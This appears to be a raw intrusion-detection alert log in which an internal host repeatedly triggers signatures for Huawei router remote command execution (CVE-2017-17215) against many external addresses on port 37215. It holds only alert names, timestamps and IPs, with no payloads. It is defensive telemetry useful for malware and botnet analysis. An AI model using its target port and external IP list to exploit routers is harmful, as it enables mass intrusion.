                                                    07/10/24-08:26:59.634541TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4106037215192.168.2.14157.226.225.51
                                                    07/10/24-08:26:45.597110TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4595837215192.168.2.1490.112.181.236
                                                    07/10/24-08:27:11.615687TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5509837215192.168.2.1498.237.13.78
                                                    07/10/24-08:26:23.297674TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5720237215192.168.2.1443.18.10.33
                                                    07/10/24-08:26:22.260584TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3893637215192.168.2.14157.64.237.237
                                                    07/10/24-08:26:53.154328TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3300437215192.168.2.14197.154.140.25
                                                    07/10/24-08:27:19.265818TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4736637215192.168.2.14197.220.90.186
                                                    07/10/24-08:26:17.944917TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3915837215192.168.2.14197.60.94.70
                                                    07/10/24-08:26:13.710026TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4287037215192.168.2.1441.124.94.167
                                                    07/10/24-08:26:14.817942TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5394037215192.168.2.14197.113.78.184
                                                    07/10/24-08:26:11.600556TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5814237215192.168.2.14157.124.43.107
                                                    07/10/24-08:27:05.164451TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3293837215192.168.2.1441.180.38.70
                                                    07/10/24-08:27:27.161744TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4873037215192.168.2.14197.206.124.124
                                                    07/10/24-08:26:20.148495TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5536037215192.168.2.1441.183.255.157
                                                    07/10/24-08:26:38.596849TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5964237215192.168.2.14178.7.60.243
                                                    07/10/24-08:26:11.452655TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6058437215192.168.2.14157.243.201.47
                                                    07/10/24-08:27:14.020001TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5522637215192.168.2.14183.238.145.102
                                                    07/10/24-08:27:32.591904TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4422237215192.168.2.14157.83.16.191
                                                    07/10/24-08:26:38.529678TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3309237215192.168.2.1441.163.56.173
                                                    07/10/24-08:26:15.806534TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4363837215192.168.2.1441.237.161.138
                                                    07/10/24-08:26:59.852225TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5039037215192.168.2.148.17.108.139
                                                    07/10/24-08:26:42.404478TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5630837215192.168.2.14197.253.68.103
                                                    07/10/24-08:26:55.453359TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6067037215192.168.2.1441.101.220.60
                                                    07/10/24-08:26:22.237344TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5338237215192.168.2.14197.115.38.152
                                                    07/10/24-08:26:11.165821TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4376437215192.168.2.1417.179.142.78
                                                    07/10/24-08:26:20.182553TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6010237215192.168.2.14157.201.193.18
                                                    07/10/24-08:26:43.919816TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5926637215192.168.2.14157.65.161.243
                                                    07/10/24-08:27:10.751291TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3530437215192.168.2.14126.218.174.70
                                                    07/10/24-08:27:22.539034TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3583437215192.168.2.14223.120.11.37
                                                    07/10/24-08:26:49.921698TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5880437215192.168.2.14197.52.144.177
                                                    07/10/24-08:27:24.988744TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5868637215192.168.2.14157.232.49.32
                                                    07/10/24-08:26:47.856770TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3712237215192.168.2.1441.20.166.7
                                                    07/10/24-08:27:33.854802TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3526437215192.168.2.14197.100.161.64
                                                    07/10/24-08:26:11.588722TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4422037215192.168.2.1441.235.170.24
                                                    07/10/24-08:26:47.868909TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4226037215192.168.2.14197.225.37.149
                                                    07/10/24-08:26:55.438982TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5335437215192.168.2.14157.223.180.35
                                                    07/10/24-08:27:10.583365TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5897437215192.168.2.14104.195.81.71
                                                    07/10/24-08:27:28.121725TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4134237215192.168.2.1441.198.64.98
                                                    07/10/24-08:26:59.665710TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3298637215192.168.2.1441.209.23.57
                                                    07/10/24-08:27:33.953196TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5995837215192.168.2.14221.170.224.108
                                                    07/10/24-08:26:49.802852TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4379437215192.168.2.14157.219.127.32
                                                    07/10/24-08:26:25.479455TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4434837215192.168.2.14157.33.195.14
                                                    07/10/24-08:26:26.588414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4710637215192.168.2.1451.185.53.95
                                                    07/10/24-08:26:28.912648TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5026237215192.168.2.14157.176.100.146
                                                    07/10/24-08:26:42.385136TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5997437215192.168.2.1441.181.233.94
                                                    07/10/24-08:26:42.383706TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5631637215192.168.2.14157.6.197.64
                                                    07/10/24-08:26:28.639081TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3371837215192.168.2.14109.122.4.196
                                                    07/10/24-08:27:30.414315TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5181437215192.168.2.1441.38.149.60
                                                    07/10/24-08:26:15.809850TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5608637215192.168.2.14157.87.221.20
                                                    07/10/24-08:26:49.846207TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5953837215192.168.2.14157.48.39.239
                                                    07/10/24-08:26:20.173091TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5025837215192.168.2.14197.147.171.60
                                                    07/10/24-08:27:23.934351TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4383237215192.168.2.14157.189.50.151
                                                    07/10/24-08:27:34.137438TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5209237215192.168.2.1441.126.89.58
                                                    07/10/24-08:26:47.860875TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4623837215192.168.2.1441.252.124.245
                                                    07/10/24-08:27:02.852572TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5354637215192.168.2.14157.191.124.139
                                                    07/10/24-08:27:22.807357TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5545837215192.168.2.14197.205.34.196
                                                    07/10/24-08:27:07.397388TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3772237215192.168.2.1440.225.112.236
                                                    07/10/24-08:26:57.647233TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5428037215192.168.2.1441.129.110.138
                                                    07/10/24-08:27:02.914738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5828037215192.168.2.1441.21.124.50
                                                    07/10/24-08:26:13.778157TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5612037215192.168.2.1438.1.173.153
                                                    07/10/24-08:27:33.894424TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5826437215192.168.2.14197.82.243.52
                                                    07/10/24-08:26:48.000365TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4736437215192.168.2.14197.132.99.189
                                                    07/10/24-08:26:43.606854TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4266237215192.168.2.1441.204.111.123
                                                    07/10/24-08:26:43.926715TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3473237215192.168.2.1441.145.177.137
                                                    07/10/24-08:26:18.037951TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4480637215192.168.2.1441.87.191.164
                                                    07/10/24-08:27:08.318438TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4527637215192.168.2.14157.155.49.161
                                                    07/10/24-08:26:31.081032TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4647037215192.168.2.1441.26.164.95
                                                    07/10/24-08:26:55.436207TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4178437215192.168.2.14157.24.1.101
                                                    07/10/24-08:27:32.517420TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3702437215192.168.2.14157.145.152.9
                                                    07/10/24-08:26:34.222865TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3845837215192.168.2.14197.231.57.195
                                                    07/10/24-08:26:15.876796TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3408037215192.168.2.14157.42.205.32
                                                    07/10/24-08:27:23.886459TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5341837215192.168.2.1462.229.81.130
                                                    07/10/24-08:26:34.260119TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4937637215192.168.2.14157.254.52.162
                                                    07/10/24-08:26:43.692447TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3528237215192.168.2.14157.127.118.7
                                                    07/10/24-08:26:52.073634TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5096837215192.168.2.14157.20.66.228
                                                    07/10/24-08:26:28.924774TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3836437215192.168.2.14157.137.165.230
                                                    07/10/24-08:27:20.517321TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5602237215192.168.2.14157.178.131.207
                                                    07/10/24-08:26:38.549975TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3429037215192.168.2.14197.196.16.15
                                                    07/10/24-08:26:42.180724TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4964437215192.168.2.14159.19.241.182
                                                    07/10/24-08:27:14.846155TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5630037215192.168.2.14197.95.128.84
                                                    07/10/24-08:26:57.525977TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3601637215192.168.2.14197.111.27.28
                                                    07/10/24-08:26:42.399244TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4559237215192.168.2.1443.196.160.117
                                                    07/10/24-08:27:28.062110TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5301237215192.168.2.1441.229.163.186
                                                    07/10/24-08:26:13.826034TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5824237215192.168.2.14171.173.231.244
                                                    07/10/24-08:26:55.400410TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5968837215192.168.2.14197.4.6.136
                                                    07/10/24-08:26:28.875517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4974037215192.168.2.14197.200.231.146
                                                    07/10/24-08:27:24.942131TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3908237215192.168.2.1441.170.220.113
                                                    07/10/24-08:26:55.302858TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4363437215192.168.2.14206.44.181.55
                                                    07/10/24-08:27:05.087235TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4128637215192.168.2.1441.4.135.56
                                                    07/10/24-08:26:51.951263TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5354637215192.168.2.14157.59.46.160
                                                    07/10/24-08:26:20.119674TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4258837215192.168.2.1441.87.223.179
                                                    07/10/24-08:26:15.861470TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4051837215192.168.2.1441.23.129.83
                                                    07/10/24-08:26:41.334233TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4490437215192.168.2.14157.246.113.13
                                                    07/10/24-08:26:53.135907TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5597637215192.168.2.14148.157.182.16
                                                    07/10/24-08:26:43.872861TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5711837215192.168.2.1441.188.6.63
                                                    07/10/24-08:26:20.187450TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5246637215192.168.2.1441.199.114.77
                                                    07/10/24-08:27:14.858579TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5082037215192.168.2.14197.224.67.72
                                                    07/10/24-08:26:57.515772TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3499037215192.168.2.14157.76.18.88
                                                    07/10/24-08:27:29.339499TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4263637215192.168.2.1441.58.14.35
                                                    07/10/24-08:26:13.830759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3848437215192.168.2.14157.29.13.246
                                                    07/10/24-08:26:28.917896TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3542437215192.168.2.14197.153.20.64
                                                    07/10/24-08:26:26.618232TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3702437215192.168.2.1441.32.231.233
                                                    07/10/24-08:26:31.080592TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5874837215192.168.2.1441.227.26.184
                                                    07/10/24-08:26:59.560985TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3621837215192.168.2.14197.221.99.88
                                                    07/10/24-08:27:30.522162TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4134637215192.168.2.1441.135.48.219
                                                    07/10/24-08:27:33.839511TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3412837215192.168.2.14119.16.77.223
                                                    07/10/24-08:27:07.376838TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4927037215192.168.2.14197.220.210.250
                                                    07/10/24-08:27:27.126835TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4607237215192.168.2.1441.20.189.153
                                                    07/10/24-08:26:34.247589TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3729437215192.168.2.1441.68.221.2
                                                    07/10/24-08:26:43.664230TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5559237215192.168.2.14145.229.42.49
                                                    07/10/24-08:27:05.064753TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3800637215192.168.2.1441.161.213.131
                                                    07/10/24-08:26:11.466916TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4999037215192.168.2.14197.242.248.238
                                                    07/10/24-08:26:41.536337TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5172437215192.168.2.14157.125.96.168
                                                    07/10/24-08:26:29.773841TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3301837215192.168.2.14197.22.120.185
                                                    07/10/24-08:27:27.058367TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5684637215192.168.2.1441.223.178.145
                                                    07/10/24-08:26:15.865384TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5136237215192.168.2.1438.174.111.133
                                                    07/10/24-08:26:11.176118TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3818037215192.168.2.14197.37.236.98
                                                    07/10/24-08:27:27.041240TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3349437215192.168.2.14197.228.30.145
                                                    07/10/24-08:27:27.165104TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5495837215192.168.2.1458.22.60.113
                                                    07/10/24-08:26:25.430749TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3801237215192.168.2.1441.60.237.83
                                                    07/10/24-08:27:14.881781TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4945237215192.168.2.14157.44.64.165
                                                    07/10/24-08:27:23.875941TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4829237215192.168.2.14197.158.223.103
                                                    07/10/24-08:26:15.840118TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3294637215192.168.2.14157.208.163.124
                                                    07/10/24-08:27:02.819826TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4726037215192.168.2.14213.110.238.132
                                                    07/10/24-08:26:14.624667TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3591037215192.168.2.14157.185.96.227
                                                    07/10/24-08:26:13.746108TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3308037215192.168.2.14183.199.201.1
                                                    07/10/24-08:26:17.991529TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4969437215192.168.2.14197.89.168.163
                                                    07/10/24-08:27:22.909155TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5586037215192.168.2.1441.189.213.6
                                                    07/10/24-08:26:52.078172TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3504437215192.168.2.14157.21.206.163
                                                    07/10/24-08:27:10.609289TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3491637215192.168.2.14163.244.219.24
                                                    07/10/24-08:26:42.381033TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3527837215192.168.2.14197.123.171.220
                                                    07/10/24-08:27:07.286567TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4811437215192.168.2.1441.50.9.168
                                                    07/10/24-08:27:33.744458TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5263437215192.168.2.14157.142.218.255
                                                    07/10/24-08:26:17.948398TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4394837215192.168.2.14157.28.239.66
                                                    07/10/24-08:26:15.821130TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3445437215192.168.2.14157.168.218.96
                                                    07/10/24-08:26:25.497334TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5648237215192.168.2.14157.119.85.157
                                                    07/10/24-08:27:33.928939TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5056637215192.168.2.14157.118.187.176
                                                    07/10/24-08:27:10.561915TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5452637215192.168.2.1441.12.99.59
                                                    07/10/24-08:26:36.341806TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5825837215192.168.2.14157.223.167.67
                                                    07/10/24-08:27:10.561451TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3399237215192.168.2.14197.30.31.189
                                                    07/10/24-08:26:11.538222TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3751637215192.168.2.145.10.195.125
                                                    07/10/24-08:26:48.023936TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4054837215192.168.2.1441.251.69.70
                                                    07/10/24-08:26:36.343615TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3968437215192.168.2.14197.133.196.153
                                                    07/10/24-08:27:10.679759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5325037215192.168.2.14197.81.128.141
                                                    07/10/24-08:26:25.468453TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4589837215192.168.2.14197.34.140.132
                                                    07/10/24-08:26:45.668696TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5691237215192.168.2.14112.246.235.174
                                                    07/10/24-08:26:43.857125TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4769237215192.168.2.1441.248.35.73
                                                    07/10/24-08:27:05.205582TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5201437215192.168.2.14197.157.49.2
                                                    07/10/24-08:26:57.525834TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4973237215192.168.2.14201.134.162.53
                                                    07/10/24-08:27:08.339308TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4368437215192.168.2.14157.129.91.117
                                                    07/10/24-08:26:43.772069TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4639437215192.168.2.14197.136.199.163
                                                    07/10/24-08:26:51.917440TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5958037215192.168.2.14197.14.184.31
                                                    07/10/24-08:26:34.239596TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3771637215192.168.2.14157.88.139.28
                                                    07/10/24-08:26:59.826024TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5704037215192.168.2.14157.90.109.204
                                                    07/10/24-08:27:14.668684TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5759037215192.168.2.14157.46.183.65
                                                    07/10/24-08:26:13.825094TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5082837215192.168.2.14157.20.222.218
                                                    07/10/24-08:27:13.728066TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3676437215192.168.2.14157.96.13.107
                                                    07/10/24-08:26:55.472197TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4255037215192.168.2.14157.172.51.157
                                                    07/10/24-08:27:00.477021TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5237237215192.168.2.14197.148.119.199
                                                    07/10/24-08:27:00.596679TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5927037215192.168.2.14157.49.113.106
                                                    07/10/24-08:27:22.532375TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4025437215192.168.2.14157.137.83.95
                                                    07/10/24-08:26:34.238192TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3567237215192.168.2.14146.53.113.100
                                                    07/10/24-08:26:28.739373TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3344637215192.168.2.14151.157.86.17
                                                    07/10/24-08:26:33.237897TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4853237215192.168.2.1441.90.102.38
                                                    07/10/24-08:27:05.156857TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3669237215192.168.2.1441.197.108.32
                                                    07/10/24-08:26:57.647317TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5235637215192.168.2.14157.189.242.81
                                                    07/10/24-08:27:02.696239TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5091837215192.168.2.14157.161.162.197
                                                    07/10/24-08:26:47.827026TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5146837215192.168.2.14197.248.164.59
                                                    07/10/24-08:26:41.525787TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5865037215192.168.2.14157.244.200.224
                                                    07/10/24-08:27:11.534381TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4797037215192.168.2.1491.250.171.217
                                                    07/10/24-08:26:55.422877TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5947637215192.168.2.14190.206.85.55
                                                    07/10/24-08:27:30.469878TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4482037215192.168.2.14113.107.101.20
                                                    07/10/24-08:27:32.538525TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3767437215192.168.2.1441.246.248.220
                                                    07/10/24-08:26:45.615423TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5266037215192.168.2.14197.90.113.165
                                                    07/10/24-08:27:33.897517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5584437215192.168.2.1467.125.96.101
                                                    07/10/24-08:27:22.898943TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4457437215192.168.2.14157.51.17.174
                                                    07/10/24-08:26:31.099598TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4971037215192.168.2.1441.95.77.144
                                                    07/10/24-08:26:38.546157TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4312437215192.168.2.1441.7.184.68
                                                    07/10/24-08:26:33.262115TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3477237215192.168.2.1493.253.131.4
                                                    07/10/24-08:26:59.835821TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5819037215192.168.2.1441.195.187.93
                                                    07/10/24-08:26:23.337851TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3561837215192.168.2.14157.85.174.74
                                                    07/10/24-08:27:31.570253TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4305837215192.168.2.1441.80.85.162
                                                    07/10/24-08:27:28.064237TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3491637215192.168.2.1441.180.77.213
                                                    07/10/24-08:26:29.842120TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3334837215192.168.2.14157.238.203.107
                                                    07/10/24-08:26:25.469526TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5743037215192.168.2.1441.184.62.99
                                                    07/10/24-08:26:38.566781TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5342837215192.168.2.14157.65.128.70
